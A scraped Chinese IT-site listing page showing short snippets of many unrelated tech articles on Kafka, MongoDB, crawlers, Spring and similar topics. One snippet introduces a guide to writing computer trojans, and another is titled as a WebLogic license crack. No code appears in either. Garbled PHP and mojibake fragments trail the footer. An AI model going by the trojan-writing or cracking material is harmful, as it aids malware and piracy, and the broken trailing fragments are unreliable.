                        我就来介绍一种香锅，那就是“这才好”麻辣香锅，它产出于著名的蜀地文化，具有悠久的历史土家风味，麻辣鲜香，健康安全。采用传统秘制麻辣香锅油辣子，还有贴心加料“孜然包”满足人们的不同口味需求，香锅底料辣椒，微辣且香，含有丰富微量元素和维生素，具有辣而不躁，味道纯正，醇厚温和。花椒采用历史悠久，被列为宫廷供品的“贡椒”的汉源花椒。我们还挑选了“川菜之魂”郫县豆瓣的鼻祖品牌豆瓣，保留最原始的郫县豆瓣味道，
                    
                    「豆包Marscode体验官」 | 云端 IDE 启动 & Rust 体验
                        张风捷特烈
iderust开发语言后端
                        theme:cyanosis我正在参加「豆包MarsCode初体验」征文活动MarsCode可以看作一个运行在服务端的远程VSCode开发环境。对于我这种想要学习体验某些语言，但不想在电脑里装环境的人来说非常友好。本文就来介绍一下在MarsCode里，我的体验rust开发体验。一、MarsCode是什么它的本质是:提供代码助手和云端IDE服务的web网站，可通过下面的链接访问https://www
                    
                    Java面试题精选：消息队列(二)
                        芒果不是芒
Java面试题精选javakafka
                        一、Kafka的特性1.消息持久化：消息存储在磁盘，所以消息不会丢失2.高吞吐量：可以轻松实现单机百万级别的并发3.扩展性：扩展性强，还是动态扩展4.多客户端支持：支持多种语言（Java、C、C++、GO、）5.KafkaStreams（一个天生的流处理）:在双十一或者销售大屏就会用到这种流处理。使用KafkaStreams可以快速的把销售额统计出来6.安全机制：Kafka进行生产或者消费的时候会
                    
                    Kafka是如何保证数据的安全性、可靠性和分区的
                        喜欢猪猪
kafka分布式
                        Kafka作为一个高性能、可扩展的分布式流处理平台，通过多种机制来确保数据的安全性、可靠性和分区的有效管理。以下是关于Kafka如何保证数据安全性、可靠性和分区的详细解析：一、数据安全性SSL/TLS加密：Kafka支持SSL/TLS协议，通过配置SSL证书和密钥来加密数据传输，确保数据在传输过程中不会被窃取或篡改。这一机制有效防止了中间人攻击，保护了数据的安全性。SASL认证：Kafka支持多种
                    
                    Python神器！WEB自动化测试集成工具 DrissionPage
                        亚丁号
python开发语言
                        一、前言用requests做数据采集面对要登录的网站时，要分析数据包、JS源码，构造复杂的请求，往往还要应付验证码、JS混淆、签名参数等反爬手段，门槛较高。若数据是由JS计算生成的，还须重现计算过程，体验不好，开发效率不高。使用浏览器，可以很大程度上绕过这些坑，但浏览器运行效率不高。因此，这个库设计初衷，是将它们合而为一，能够在不同须要时切换相应模式，并提供一种人性化的使用方法，提高开发和运行效率
                    
                    Java爬虫框架（一）--架构设计
                        狼图腾-狼之传说
java框架java任务html解析器存储电子商务
                        一、架构图那里搜网络爬虫框架主要针对电子商务网站进行数据爬取，分析，存储，索引。爬虫：爬虫负责爬取，解析，处理电子商务网站的网页的内容数据库：存储商品信息索引：商品的全文搜索索引Task队列：需要爬取的网页列表Visited表：已经爬取过的网页列表爬虫监控平台：web平台可以启动，停止爬虫，管理爬虫，task队列，visited表。二、爬虫1.流程1)Scheduler启动爬虫器，TaskMast
                    
                    Java：爬虫框架
                        dingcho
Javajava爬虫
                        一、ApacheNutch2【参考地址】Nutch是一个开源Java实现的搜索引擎。它提供了我们运行自己的搜索引擎所需的全部工具。包括全文搜索和Web爬虫。Nutch致力于让每个人能很容易,同时花费很少就可以配置世界一流的Web搜索引擎.为了完成这一宏伟的目标,Nutch必须能够做到:每个月取几十亿网页为这些网页维护一个索引对索引文件进行每秒上千次的搜索提供高质量的搜索结果简单来说Nutch支持分
                    
                    2022-10-10
                        幸福芳芳

                        10.10日觉察日记1.事件：开晨会员工来不齐，路远的请假，离得近的也请假，一律不批！2.感受：生气，气愤（情绪如何转化或使用）3.想法：1.今年已经很少开晨会了，非必要不会通知开会的，临近点了再打电话请假，又不是特别忙的季节，借口都会找～～2.不来的按公司标准执行负激励，待岗处理！我为你们负责，你们安全重要会议都不参加，自己都不为自己负责！以后有事也别找我！尤其是经销商老板，自己都不清楚自己用工
                    
                    MongoDB知识概括
                        GeorgeLin98
持久层mongodb
                        MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景：传统的关系型数据库（如MySQL），在数据操作的“三高”需求以及应对Web2.0的网站需求面前，显得力不从心。解释：“三高”需求：①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
                    
                    计算机木马详细编写思路
                        小熊同学哦
php开发语言木马木马思路
                        导语：计算机木马（ComputerTrojan）是一种恶意软件，通过欺骗用户从而获取系统控制权限，给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险，但是了解它的工作原理与编写思路，对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路，以及如何复杂化挑战，以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
                    
                    基于STM32的汽车仪表显示系统：集成CAN、UART与I2C总线设计流程
                        极客小张
stm32汽车嵌入式硬件物联网单片机c语言
                        一、项目概述项目目标与用途本项目旨在设计和实现一个基于STM32微控制器的汽车仪表显示系统。该系统能够实时显示汽车的速度、转速、油量等关键信息，并通过CAN总线与其他汽车控制单元进行通信。这种仪表显示系统不仅提高了驾驶的安全性和便捷性，还能为汽车提供更智能的用户体验。技术栈关键词微控制器：STM32显示技术：TFTLCD/OLED传感器：速度传感器、温度传感器、油量传感器通信协议：CAN总线、UA
                    
                    3286、穿越网格图的安全路径
                        Lenyiin
题解c++算法leetcode
                        3286、[中等]穿越网格图的安全路径1、题目描述给你一个mxn的二进制矩形grid和一个整数health表示你的健康值。你开始于矩形的左上角(0,0)，你的目标是矩形的右下角(m-1,n-1)。你可以在矩形中往上下左右相邻格子移动，但前提是你的健康值始终是正数。对于格子(i,j)，如果grid[i][j]=1，那么这个格子视为不安全的，会使你的健康值减少1。如果你可以到达最终的格子，请你返回tr
                    
                    Python实现下载当前年份的谷歌影像
                        sand&wich
python开发语言
                        在GIS项目和地图应用中，获取最新的地理影像数据是非常重要的。本文将介绍如何使用Python代码从Google地图自动下载当前年份的影像数据，并将其保存为高分辨率的TIFF格式文件。这个过程涉及地理坐标转换、多线程下载和图像处理。关键功能该脚本的核心功能包括：坐标转换：支持WGS-84与WebMercator投影之间转换，以及处理中国GCJ-02偏移。自动化下载：多线程下载地图瓦片，提高效率。图像
                    
                    Spring MVC 全面指南：从入门到精通的详细解析
                        一杯梅子酱
技术栈学习springmvcjava
                        引言：SpringMVC，作为Spring框架的一个重要模块，为构建Web应用提供了强大的功能和灵活性。无论是初学者还是有一定经验的开发者，掌握SpringMVC都将显著提升你的Web开发技能。本文旨在为初学者提供一个全面且易于理解的学习路径，通过详细的知识点分析和实际案例，帮助你快速上手SpringMVC，让学习过程既深刻又高效。一、SpringMVC简介1.1什么是SpringMVC？Spri
                    
                                Spring4.1新特性——Spring MVC增强
                                    jinnianshilongnian
spring 4.1
                                    目录 
Spring4.1新特性——综述 
Spring4.1新特性——Spring核心部分及其他 
Spring4.1新特性——Spring缓存框架增强 
Spring4.1新特性——异步调用和事件机制的异常处理 
Spring4.1新特性——数据库集成测试脚本初始化 
Spring4.1新特性——Spring MVC增强 
Spring4.1新特性——页面自动化测试框架Spring MVC T
                                
                                mysql 性能查询优化
                                    annan211
javasql优化mysql应用服务器
                                    

1 时间到底花在哪了？
  mysql在执行查询的时候需要执行一系列的子任务，这些子任务包含了整个查询周期最重要的阶段，这其中包含了大量为了
  检索数据列到存储引擎的调用以及调用后的数据处理，包括排序、分组等。在完成这些任务的时候，查询需要在不同的地方
  花费时间，包括网络、cpu计算、生成统计信息和执行计划、锁等待等。尤其是向底层存储引擎检索数据的调用操作。这些调用需要在内存操
                                
                                windows系统配置
                                    cherishLC
windows
                                    删除Hiberfil.sys ：使用命令powercfg -h off 关闭休眠功能即可： 
http://jingyan.baidu.com/article/f3ad7d0fc0992e09c2345b51.html 
类似的还有pagefile.sys 
 
msconfig 配置启动项 
shutdown 定时关机 
 
ipconfig 查看网络配置 
ipconfig /flushdns
                                
                                人体的排毒时间
                                    Array_06
工作
                                    ======================== 
||  人体的排毒时间是什么时候？|| 
========================  
 
转载于： 
http://zhidao.baidu.com/link?url=ibaGlicVslAQhVdWWVevU4TMjhiKaNBWCpZ1NS6igCQ78EkNJZFsEjCjl3T5EdXU9SaPg04bh8MbY1bR
                                
                                ZooKeeper
                                    cugfy
zookeeper
                                    Zookeeper是一个高性能，分布式的，开源分布式应用协调服务。它提供了简单原始的功能，分布式应用可以基于它实现更高级的服务，比如同步， 配置管理，集群管理，名空间。它被设计为易于编程，使用文件系统目录树作为数据模型。服务端跑在java上，提供java和C的客户端API。 Zookeeper是Google的Chubby一个开源的实现，是高有效和可靠的协同工作系统，Zookeeper能够用来lea
                                
                                网络爬虫的乱码处理
                                    随意而生
爬虫网络
                                    下边简单总结下关于网络爬虫的乱码处理。注意，这里不仅是中文乱码，还包括一些如日文、韩文 、俄文、藏文之类的乱码处理，因为他们的解决方式 是一致的，故在此统一说明。     网络爬虫，有两种选择，一是选择nutch、hetriex，二是自写爬虫，两者在处理乱码时，原理是一致的，但前者处理乱码时，要看懂源码后进行修改才可以，所以要废劲一些；而后者更自由方便，可以在编码处理
                                
                                Xcode常用快捷键
                                    张亚雄
xcode
                                    一、总结的常用命令： 
 
    隐藏xcode command+h 
 
    退出xcode command+q 
 
    关闭窗口 command+w 
 
    关闭所有窗口 command+option+w 
 
    关闭当前
                                
                                mongoDB索引操作
                                    adminjun
mongodb索引
                                    一、索引基础：    MongoDB的索引几乎与传统的关系型数据库一模一样，这其中也包括一些基本的优化技巧。下面是创建索引的命令：    > db.test.ensureIndex({"username":1})    可以通过下面的名称查看索引是否已经成功建立： &nbs
                                
                                成都软件园实习那些话
                                    aijuans
成都 软件园 实习
                                    无聊之中，翻了一下日志，发现上一篇经历是很久以前的事了，悔过~~ 
　　断断续续离开了学校快一年了，习惯了那里一天天的幼稚、成长的环境，到这里有点与世隔绝的感觉。不过还好，那是刚到这里时的想法，现在感觉在这挺好，不管怎么样，最要感谢的还是老师能给这么好的一次催化成长的机会，在这里确实看到了好多好多能想到或想不到的东西。 
　　都说在外面和学校相比最明显的差距就是与人相处比较困难，因为在外面每个人都
                                
                                Linux下FTP服务器安装及配置
                                    ayaoxinchao
linuxFTP服务器vsftp
                                    检测是否安装了FTP 
[root@localhost ~]# rpm -q vsftpd 
如果未安装：package vsftpd is not installed  安装了则显示：vsftpd-2.0.5-28.el5累死的版本信息 
  
安装FTP 
运行yum install vsftpd命令，如[root@localhost ~]# yum install vsf
                                
                                使用mongo-java-driver获取文档id和查找文档
                                    BigBird2012
driver
                                    注：本文所有代码都使用的mongo-java-driver实现。 
  
在MongoDB中，一个集合（collection）在概念上就类似我们SQL数据库中的表（Table），这个集合包含了一系列文档（document）。一个DBObject对象表示我们想添加到集合（collection）中的一个文档（document），MongoDB会自动为我们创建的每个文档添加一个id，这个id在
                                
                                JSONObject以及json串
                                    bijian1013
jsonJSONObject
                                    一.JAR包简介 
    要使程序可以运行必须引入JSON-lib包，JSON-lib包同时依赖于以下的JAR包： 
    1.commons-lang-2.0.jar 
    2.commons-beanutils-1.7.0.jar 
    3.commons-collections-3.1.jar 
&n
                                
                                [Zookeeper学习笔记之三]Zookeeper实例创建和会话建立的异步特性
                                    bit1129
zookeeper
                                    为了说明问题，看个简单的代码， 
  
    import org.apache.zookeeper.*;  
      
    import java.io.IOException;  
    import java.util.concurrent.CountDownLatch;  
    import java.util.concurrent.ThreadLocal
                                
                                【Scala十二】Scala核心六：Trait
                                    bit1129
scala
                                    Traits are a fundamental unit of code reuse in Scala. A trait encapsulates method and field definitions, which can then be reused by mixing them into classes. Unlike class inheritance, in which each c
                                
                                weblogic version 10.3破解
                                    ronin47
weblogic
                                    版本：WebLogic Server 10.3 
 
说明：%DOMAIN_HOME%：指WebLogic Server 域(Domain）目录 
例如我的做测试的域的根目录 DOMAIN_HOME=D:/Weblogic/Middleware/user_projects/domains/base_domain 
 
1.为了保证操作安全，备份%DOMAIN_HOME%/security/Defa
                                
                                求第n个斐波那契数
                                    BrokenDreams

                                            今天看到群友发的一个问题：写一个小程序打印第n个斐波那契数。 
        自己试了下，搞了好久。。。基础要加强了。 
        
  &nbs
                                
                                读《研磨设计模式》-代码笔记-访问者模式-Visitor
                                    bylijinnan
java设计模式
                                    声明： 本文只为方便我个人查阅和理解，详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 


import java.util.ArrayList;
import java.util.List;

interface IVisitor {
	
	//第二次分派，Visitor调用Element
	void visitConcret
                                
                                MatConvNet的excise 3改为网络配置文件形式
                                    cherishLC
matlab
                                    MatConvNet为vlFeat作者写的matlab下的卷积神经网络工具包，可以使用GPU。 
主页：
http://www.vlfeat.org/matconvnet/ 
教程：
http://www.robots.ox.ac.uk/~vgg/practicals/cnn/index.html 
 
注意：需要下载新版的MatConvNet替换掉教程中工具包中的matconvnet：
http
                                
                                ZK Timeout再讨论
                                    chenchao051
zookeepertimeouthbase
                                    http://crazyjvm.iteye.com/blog/1693757 文中提到相关超时问题，但是又出现了一个问题，我把min和max都设置成了180000，但是仍然出现了以下的异常信息： 
Client session timed out, have not heard from server in 154339ms for sessionid 0x13a3f7732340003
                                
                                CASE WHEN 用法介绍
                                    daizj
sqlgroup bycase when
                                    CASE WHEN 用法介绍 
 
1. CASE WHEN 表达式有两种形式 
 
 
--简单Case函数  
 
CASE sex  
WHEN '1' THEN '男'  
WHEN '2' THEN '女'  
ELSE '其他' END  
 
--Case搜索函数  
 
CASE 
WHEN sex = '1' THEN 
                                
                                PHP技巧汇总:提高PHP性能的53个技巧
                                    dcj3sjt126com
PHP
                                    PHP技巧汇总:提高PHP性能的53个技巧　　用单引号代替双引号来包含字符串，这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量，　　单引号则不会，注意：只有echo能这么做，它是一种可以把多个字符串当作参数的函数译注：　　PHP手册中说echo是语言结构，不是真正的函数，故把函数加上了双引号)。　　1、如果能将类的方法定义成static，就尽量定义成static，它的速度会提升将近4倍
                                
                                Yii框架中CGridView的使用方法以及详细示例
                                    dcj3sjt126com
yii
                                    CGridView显示一个数据项的列表中的一个表。 
表中的每一行代表一个数据项的数据,和一个列通常代表一个属性的物品(一些列可能对应于复杂的表达式的属性或静态文本)。　　CGridView既支持排序和分页的数据项。排序和分页可以在AJAX模式或正常的页面请求。使用CGridView的一个好处是,当用户浏览器禁用JavaScript,排序和分页自动退化普通页面请求和仍然正常运行。 
实例代码如下：
                                
                                Maven项目打包成可执行Jar文件
                                    dyy_gusi
assembly
                                    Maven项目打包成可执行Jar文件 
在使用Maven完成项目以后，如果是需要打包成可执行的Jar文件，我们通过eclipse的导出很麻烦，还得指定入口文件的位置，还得说明依赖的jar包，既然都使用Maven了，很重要的一个目的就是让这些繁琐的操作简单。我们可以通过插件完成这项工作，使用assembly插件。具体使用方式如下： 
1、在项目中加入插件的依赖： 
<plugin>
	
                                
                                php常见错误
                                    geeksun
PHP
                                    1.  kevent() reported that connect() failed (61: Connection refused) while connecting to upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastc
                                
                                修改linux的用户名
                                    hongtoushizi
linuxchange password
                                    Change Linux Username 
更改Linux用户名，需要修改4个系统的文件： 
/etc/passwd 
/etc/shadow 
/etc/group 
/etc/gshadow 
古老/传统的方法是使用vi去直接修改，但是这有安全隐患（具体可自己搜一下），所以后来改成使用这些命令去代替： 
vipw 
vipw -s 
vigr 
vigr -s 
  
具体的操作顺
                                
                                第五章 常用Lua开发库1-redis、mysql、http客户端
                                    jinnianshilongnian
nginxlua
                                    对于开发来说需要有好的生态开发库来辅助我们快速开发，而Lua中也有大多数我们需要的第三方开发库如Redis、Memcached、Mysql、Http客户端、JSON、模板引擎等。 
一些常见的Lua库可以在github上搜索，https://github.com/search?utf8=%E2%9C%93&q=lua+resty。 
  Redis客户端 
lua-resty-r
                                
                                zkClient 监控机制实现
                                    liyonghui160com
zkClient 监控机制实现
                                      
       直接使用zk的api实现业务功能比较繁琐。因为要处理session loss，session expire等异常，在发生这些异常后进行重连。又因为ZK的watcher是一次性的，如果要基于wather实现发布/订阅模式，还要自己包装一下，将一次性订阅包装成持久订阅。另外如果要使用抽象级别更高的功能，比如分布式锁，leader选举
                                
                                在Mysql 众多表中查找一个表名或者字段名的 SQL 语句
                                    pda158
mysql
                                    在Mysql 众多表中查找一个表名或者字段名的 SQL 语句：   
　　方法一：SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name';
　　方法二：SELECT column_name from information_schema.colum
                                
                                程序员对英语的依赖
                                    Smile.zeng
英语程序猿
                                    1、程序员最基本的技能，至少要能写得出代码，当我们还在为建立类的时候思考用什么单词发牢骚的时候，英语与别人的差距就直接表现出来咯。 
2、程序员最起码能认识开发工具里的英语单词，不然怎么知道使用这些开发工具。 
3、进阶一点，就是能读懂别人的代码，有利于我们学习人家的思路和技术。 
4、写的程序至少能有一定的可读性，至少要人别人能懂吧... 
 
以上一些问题，充分说明了英语对程序猿的重要性。骚年
                                
                                Oracle学习笔记(8) 使用PLSQL编写触发器
                                    vipbooks
oraclesql编程活动Access
                                        时间过得真快啊，转眼就到了Oracle学习笔记的最后个章节了，通过前面七章的学习大家应该对Oracle编程有了一定了了解了吧，这东东如果一段时间不用很快就会忘记了，所以我会把自己学习过的东西做好详细的笔记，用到的时候可以随时查找，马上上手！希望这些笔记能对大家有些帮助！ 
    这是第八章的学习笔记，学习完第七章的子程序和包之后
                                
                
            
        
    


    
        
            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    


    
        
            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.

        
    














' . htmlentities($func) . ' Opt
' . htmlentities($value) . ' 涓嬭浇 / 鍒犻櫎